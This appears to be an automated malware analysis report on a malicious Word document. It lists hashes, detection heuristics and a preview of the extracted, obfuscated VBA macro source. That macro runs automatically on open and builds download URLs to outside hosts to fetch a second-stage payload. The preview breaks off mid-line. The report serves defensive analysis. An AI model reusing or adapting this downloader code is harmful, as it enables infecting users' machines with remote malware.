Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a27c8898863b6f6e…

MALICIOUS

Office (OLE)

118.5 KB Created: 2015-07-30 11:48:00 Authoring application: Microsoft Office Word First seen: 2017-11-13
MD5: 73618ac8eb4efb8cc915244d2a351b1a SHA-1: e16a974045f15b86ed27c97206878e284b89bb73 SHA-256: a27c8898863b6f6e657e717e87da34a0c575eb1c754ade5d0e2cc939e7858a60
390 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample contains multiple VBA auto-execution macros (AutoOpen, Workbook_Open, Auto_Open) and a critical `Shell()` call, indicating it is designed to run arbitrary code. The presence of a `CreateObject` call further suggests the execution of external processes. The document body, while truncated, contains elements typical of a lure, and the ClamAV detection as 'Doc.Downloader.Generic' strongly supports the conclusion that this file is a downloader. The VBA script attempts to construct a URL using obfuscated string manipulation, likely for downloading a second-stage payload.

Heuristics 12

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12641 bytes
SHA-256: 92f40023f712f7e531df1c0e69ae1b747d85993e6800680584357bc9d7aa212c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

 Sub NBqhwdjqgw_Open()
     
End Sub
Sub OQIODQWsadas_Open()
     
End Sub
Sub Auto_Open()
    Zahsdhkasjd
End Sub
Sub Zahsdhkasjd()
    AQWDHQWJD = "21ghe jh21feg12f "
    Gqwkdopqwkdqw
End Sub
Sub Giqjwdhqwkjq()
    SWDQWQ = "21bejhg h2j1gejh21g "
End Sub
Sub AutoOpen()
    ASFQW = "12jhe jgh12e 2j1"
    Zahsdhkasjd
End Sub

Sub Workbook_Open()
    BHYJQDGWQ = "12hej g12hjge2h1jeg 21"
    Auto_Open
End Sub
 
Sub Gqwkdopqwkdqw()

    
    Dim fallout As Integer, silkroad As Integer, inclife As Integer
    Dim hnquhdjincinc As Integer
    Dim retVal As Variant, masopaso As Integer, incturakk As Integer, kaladd As Integer, BWBBNS As String, KOLYHDN As String
    KOLYHDN = Chr(90 + 2)
    
    
    ANGOLA = "" & Ubqhwdhwqbd(12079)
    BWBBNS = "p"
    BWBBNS = "em" & BWBBNS
    BWBBNS = Chr(60 + 24) + BWBBNS
    QHDQUWH = ANGOLA
    FL2 = QHDQUWH
    PH2 = Module2.Goabc(BWBBNS) + KOLYHDN
    
    silkroad = 9
    jwnqdw = -1
    
    BOSNIA = 8719723
    BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
    KORAN = BOSNIA
    

    JWIDJIAAA = ""
    
    QIWJDABB = Chr(90 + 8)
    HUYFEA = QIWJDABB + "a" + Chr(116)
    PSFL = FL2 + Chr(40 + 6) + "p" & "" & "s1"
    
    
    masopaso = TRnqjdkqSjsadSS(1 - 300 * Sin(20)):
    SSS = Chr(KORAN + masopaso + 1 + 1)
    VBFL = FL2 + Chr(50 - 4) + "vb" & "" & SSS & ""
    BAFL = FL2 + Chr(TRnqjdkqSjsadSS(Fix(-22.043)) + 31 - 10 + 25 + masopaso + 2) + HUYFEA
    
    INTG = "ob" + "ject"
    KIWD = Chr(10 + 100 + TRnqjdkqSjsadSS(CInt(Len(BAFL)))) + "dul" & "e"
    AFTG = Chr(109) & KIWD
    
    SXEE = ""
    SXAA = ""
    SXE = SXEE & SXAA & "" & ""
    GNG = ".j" & "pg"
    SXE = ".exe"
    
    
    HUQD = Chr(30 + 16 + 1)
    ATTH = "ht" + "" & "tp" + "://"
    BQHJDQ = "s" & "" & "av" + "e" & "pi" + "c" & Chr(46) & "su" + HUQD
     
    PSPTH = PH2 + PSFL
    VBPTH = PH2 + VBFL
    BAPTH = "jb2e j12hej12ge 21"
    ABPTH = PH2 + BAFL
    BAPTH = ABPTH
    JHQKWDQAASS = BQHJDQ
    
    Dim KORANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
    
    DRT = 315
    BFT = 316
    CFT = 317
    DFT = 318
    EFT = 319
    Dim NUWDHUQHUQWDH As String
    NUWDHUQHUQWDH = "" + "USE" & "RPROFILE"
    Dim PBIn As String, asdwq As String, MIWDWQ As String
    
   
    
    TSTS = "." + "tx" + "t"
    CDDD = "78672738612836" + TSTS
    LNSS = "f" & "a" & "f" & "a" & "" + TSTS
    STT1 = "mexmers" + "erver.com/co" + "mponents/co" + "m_wr" + "apper/"
    STT2 = "www.piscinebist" + "rita.ro/la" + "nguage/e" + "n-G" + "B/"


    PBIn = ATTH + STT1 + CDDD
    CONT = Module2.Linolium(PBIn)
     
    asdwq = Rasdas(CONT)
    
    HQUWDAAA = "0"
    If (asdwq <> "=") Then
        PBIn = ATTH + STT2 + CDDD
        CONT = Module2.Linolium(PBIn)
        asdwq = CONT
        HQUWDAAA = "1"
    End If
    
    CONT = Quqhwdbyas(asdwq)
     
    Dim ahuywdgqy As String
    DJQND = "text"
    NJDSS = "stext"
     
    TVT10 = Port(CONT, DJQND & "10")
    TVT20 = Port(CONT, DJQND & "20")
    TVT21 = Port(CONT, DJQND & "21")
    TVT30 = Port(CONT, DJQND & "30")
    TVT31 = Port(CONT, DJQND & "31")
    XPT1 = Port(CONT, NJDSS & "1")
    XPT2 = Port(CONT, NJDSS & "2")
    XPT3 = Port(CONT, NJDSS & "3")
    
    
    WVR = Module2.Goabc(NUWDHUQHUQWDH)
    hufehu1 = InStr(WVR, "sers\")
    
    Dim hudhw As Integer
    Dim ghdAdd(1 To 3)
    ghdAdd(1) = "1"
    ghdAdd(2) = "0"
    ghdAdd(3) = "0"
    
    If (hufehu1 <> 0) Then
        ghdAdd(1) = "2"
    Else
        ghdAdd(2) = "3"
    End If


    JHWQUD = Join(ghdAdd)
    hudhw = Val(JHWQUD)
    
    Module2.Crispy (1)
    
    MIWDWQ = ATTH + STT1 + LNSS
    If (HQUWDAA
... (truncated)